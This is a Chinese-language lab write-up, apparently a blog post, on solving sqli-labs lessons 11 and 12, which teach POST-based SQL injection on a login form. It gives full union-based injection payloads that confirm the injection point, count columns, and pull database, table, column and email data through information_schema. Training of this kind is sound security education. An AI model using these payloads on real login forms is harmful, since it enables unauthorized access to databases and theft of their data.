• sqli-labs less-11 --> less-12

    Less-11(报错注入POST方式)

    1.判断是否存在注入点

     

         因为是POST 方式的与GET方式稍有不同,可以选择使用burp suite以及火狐的hackbar进行操作,直接在输入框username处输入admin密码随意,得到一个正确的回显

     

    Username处输入admin密码随意,出现报错

     提示在123456处因为 ’ 出现错误,所以尝试在username处输入admin’ #(将密码及后面部分全部注释掉,即为:uname=admin' #&passwd=123456&submit=Submit)(这里不能用--+

    回显正确,判断存在注入点,注入方式为:’’

    2.判断回显位数

        uname=admin' order by 2#&passwd=1&submit=Submit  经过判断得到回显位数为2

    3.爆数据库

        uname=-admin' union select 1,database()#&passwd=1&submit=Submit

    因为使用union,那么前面部分必须要不存在才行,得到数据库名字为security

    4.爆表名

        uname=-admin' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #&passwd=1&submit=Submit,如下图,得到数据库下的所有表名

     5.爆字段

        uname=-admin' union select group_concat(column_name) from information_schema.columns where table_name='emails' #&passwd=1&submit=Submit,发现出现了如下报错的提示:

    使用的SELECT语句具有不同数量的列

    经过检查发现:回显位是2,但是使用select语句时并没有用两个

        修改为:uname=-admin' union select 1,group_concat(column_name) from information_schema.columns where table_name='emails' #&passwd=&submit=Submit

    如下图,得到表emails下的所有字段

    6.爆数据

        uname=-admin' union select 1,group_concat(id) from emails #&passwd=&submit=Submit

    如图,得到字段id下的所有数据

    -------------------------------------------------------END----------------------------------------------------------------

    Less-12(报错注入)

    1.判断是否存在注入点

      当执行admin 以及admin'时都未出现报错,而执行如下时,出现报错信息

    uname=admin"&passwd=admin&submit=Submit

      通过分析,当执行uname=admin")#&passwd=&submit=Submit时,回显正常,判断存在注入点,注入方式为:(“”)

    2.判断回显位数

          uname=admin") order by 2#&passwd=&submit=Submit,经过尝试得到回显位数为2

    3.爆数据库

          uname=-admin") union select 1,database()#&passwd=&submit=Submit,得到数据库名

    4.爆表名

          uname=uname=-admin") union select 1, group_concat(table_name) from information_schema.tables where table_schema='security'#&passwd=&submit=Submit

    5.爆字段

          uname=-admin") union select 1,group_concat(column_name) from information_schema.columns where table_name='uagent'#&passwd=&submit=Submit,表uagent中的数据为空,如下

    6.爆数据

      因为uagent里的数据都为空,所以还是选择爆emails,比较好观察

    uname=-admin") union select 1,group_concat(email_id) from emails#&passwd=&submit=Submit

    -------------------------------------------------------END----------------------------------------------------------------
  • 相关阅读:
    web前段知识
    如何查看服务器机型,如何查看软件的版本信息
    selenium server启动失败
    性能测试策略
    mysql_列出表中所有字段用逗号做分隔符
    复杂sql(1)
    orale建表查询
    javascript常用函数集
    orale用户角色管理
    数据流
  • 原文地址:https://www.cnblogs.com/B-roin/p/12297064.html
Copyright © 2020-2023  润新知